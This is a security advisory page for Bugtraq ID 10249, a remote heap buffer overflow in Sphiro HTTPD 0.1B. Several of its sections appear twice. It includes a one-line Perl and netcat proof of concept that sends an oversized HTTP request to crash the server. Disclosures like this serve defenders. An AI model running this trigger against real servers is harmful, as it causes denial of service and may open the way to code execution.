Rosiello Security Sphiro HTTPD Remote Heap Buffer Overflow Vulnerability
BID:10249
Info
Rosiello Security Sphiro HTTPD Remote Heap Buffer Overflow Vulnerability
| Bugtraq ID: | 10249 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 30 2004 12:00AM |
| Updated: | Apr 30 2004 12:00AM |
| Credit: | Discovery of this issue is credited to Slotto Corleone <[email protected]>. |
| Vulnerable: |
Rosiello Security Sphiro HTTPD 0.1 B |
| Not Vulnerable: | |
Discussion
Rosiello Security Sphiro HTTPD Remote Heap Buffer Overflow Vulnerability
It has been reported that Sphiro HTTPD is prone to a remote heap based buffer overflow vulnerability. This issue is due to a failure of the application to properly verify buffer boundaries before storing input in fixed buffers.
Immediate consequences of this attack may cause the affected daemon to crash, denying service to legitimate users. Furthermore, due to the nature this issue, arbitrary code execution may be possible. This would occur in the context running daemon process.
It has been reported that Sphiro HTTPD is prone to a remote heap based buffer overflow vulnerability. This issue is due to a failure of the application to properly verify buffer boundaries before storing input in fixed buffers.
Immediate consequences of this attack may cause the affected daemon to crash, denying service to legitimate users. Furthermore, due to the nature this issue, arbitrary code execution may be possible. This would occur in the context running daemon process.
Exploit / POC
Rosiello Security Sphiro HTTPD Remote Heap Buffer Overflow Vulnerability
The following proof of concept has been provided:
perl -e 'print "GET HTTP/1.1" . "A"x1000 . "\n\n"' |nc www.example.com 80
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
The following proof of concept has been provided:
perl -e 'print "GET HTTP/1.1" . "A"x1000 . "\n\n"' |nc www.example.com 80
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution / Fix
Rosiello Security Sphiro HTTPD Remote Heap Buffer Overflow Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Rosiello Security Sphiro HTTPD Remote Heap Buffer Overflow Vulnerability
References:
References:
- Vendor Home Page (Rosiello Security)